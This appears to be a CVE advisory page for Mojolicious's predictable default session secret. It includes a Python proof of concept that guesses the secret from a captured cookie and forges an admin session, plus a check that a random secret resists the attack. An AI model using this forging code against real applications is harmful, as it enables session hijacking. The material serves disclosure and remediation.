
THREATINT
PUBLISHED

CVE-2024-58134

Mojolicious versions from 0.999922 through 9.40 for Perl use a hard-coded string, or the application's class name, as the HMAC session secret by default

Description

Mojolicious versions from 0.999922 through 9.40 for Perl use a hard-coded string, or the application's class name, as the HMAC session secret by default. These predictable default secrets can be exploited to forge session cookies: an attacker who knows or guesses the secret can compute valid HMAC signatures for the session cookie and so tamper with or hijack another user's session. Only applications that never configure their own secrets are exposed, since an explicitly configured secret replaces the default; the remediation is to set a long, random, application-specific secret and keep it out of version control.
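The following is an added example (not code from Mojolicious, Synacktiv, or this advisory) showing why a guessable secret is fatal for a signed-but-not-encrypted session cookie. It assumes the cookie layout `<value>--<hex HMAC-SHA1 of value under the secret>` with the session stored as base64-encoded JSON; confirm the exact format against the Mojolicious source linked in the references before using this against a real target. The secret `my_app`, the wordlist and the victim cookie are all constructed for the demo and are not the project's actual default values.

```python
"""Forging a Mojolicious-style signed session cookie when the HMAC secret is
guessable (the bug class of CVE-2024-58134). Added example, not project code.

Assumptions (verify against the Mojolicious source in the references):
  - session data is compact JSON, base64-encoded without line breaks
  - the signed form is "<value>--<hex HMAC-SHA1(value, secret)>"
  - the default secret is a static string; "my_app" below is a constructed
    stand-in for the class-name / moniker default, not the real value
"""
import base64
import hashlib
import hmac
import json
import secrets as _secrets
from typing import Optional


def _mac(value: str, secret: str) -> str:
    """Hex HMAC-SHA1 of the cookie value under the secret (assumed algorithm)."""
    return hmac.new(secret.encode(), value.encode(), hashlib.sha1).hexdigest()


def encode_session(session: dict) -> str:
    """Serialize a session as compact JSON, then standard base64 (no newlines)."""
    raw = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    return base64.b64encode(raw).decode()


def sign(value: str, secret: str) -> str:
    """Produce the signed cookie form '<value>--<hex hmac>'."""
    return f"{value}--{_mac(value, secret)}"


def split_signed(cookie: str) -> tuple:
    """Split '<value>--<hmac>' on the last '--' (base64 never contains '-')."""
    value, sep, mac = cookie.rpartition("--")
    if not sep:
        raise ValueError("not a signed cookie")
    return value, mac


def decode_session(cookie: str) -> dict:
    """Read the payload: no secret needed, the cookie is signed, not encrypted."""
    value, _ = split_signed(cookie)
    return json.loads(base64.b64decode(value))


def recover_secret(cookie: str, candidates: list) -> Optional[str]:
    """Offline guess: first candidate whose HMAC matches the cookie's MAC."""
    value, mac = split_signed(cookie)
    for candidate in candidates:
        if hmac.compare_digest(_mac(value, candidate), mac):
            return candidate
    return None


def forge(cookie: str, secret: str, **changes) -> str:
    """Rewrite session fields and re-sign with the recovered secret."""
    session = decode_session(cookie)
    session.update(changes)
    return sign(encode_session(session), secret)


# Constructed demo inputs; the references document the real default values.
WEAK_SECRET = "my_app"                                  # constructed default
WORDLIST = ["Mojolicious", "MyApp", "my_app", "secret"]  # constructed guesses
VICTIM_COOKIE = sign(encode_session({"user": "alice", "expires": 1700000000}), WEAK_SECRET)


def demo() -> dict:
    """Run the attack end to end; return what the forged cookie decodes to."""
    secret = recover_secret(VICTIM_COOKIE, WORDLIST)
    if secret is None:
        return {}
    forged = forge(VICTIM_COOKIE, secret, user="admin")
    # A server holding the same secret would accept the forged signature.
    assert recover_secret(forged, [secret]) == secret
    return decode_session(forged)


def strong_secret_resists(candidates: list) -> bool:
    """With a random 256-bit secret the same wordlist recovers nothing."""
    cookie = sign(encode_session({"user": "alice"}), _secrets.token_hex(32))
    return recover_secret(cookie, candidates) is None


if __name__ == "__main__":
    print("forged session:", demo())
    print("random secret survives wordlist:", strong_secret_resists(WORDLIST))
```

The guessing step is embarrassingly parallel, which is why the references include a hashcat pull request: a defender should assume the default secret is recoverable from a single captured cookie. The hardened side of the example is `strong_secret_resists`: once the application configures a random secret, the same wordlist attack yields nothing, which is exactly the remediation the advisory points to.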

Reserved 2025-04-07 | Published 2025-05-03 | Updated 2025-05-12 | Assigner CPANSec

Problem types

CWE-321 Use of Hard-coded Cryptographic Key

CWE-331 Insufficient Entropy

Product status

Default status: unaffected

0.999922 (through 9.40, per the summary above): affected

Credits

Antoine Cervoise (Synacktiv), analyst

Jakub Kramarz, analyst

Lukas Atkinson, analyst

References

github.com/mojolicious/mojo/pull/1791

github.com/mojolicious/mojo/pull/2200

www.synacktiv.com/publications/baking-mojolicious-cookies

medium.com/...rity-problems-through-security-by-13da7c225802

metacpan.org/...I/Mojolicious-9.39/source/lib/Mojolicious.pm

github.com/hashcat/hashcat/pull/4090

cve.org (CVE-2024-58134)

nvd.nist.gov (CVE-2024-58134)

https://cve.threatint.eu/CVE/CVE-2024-58134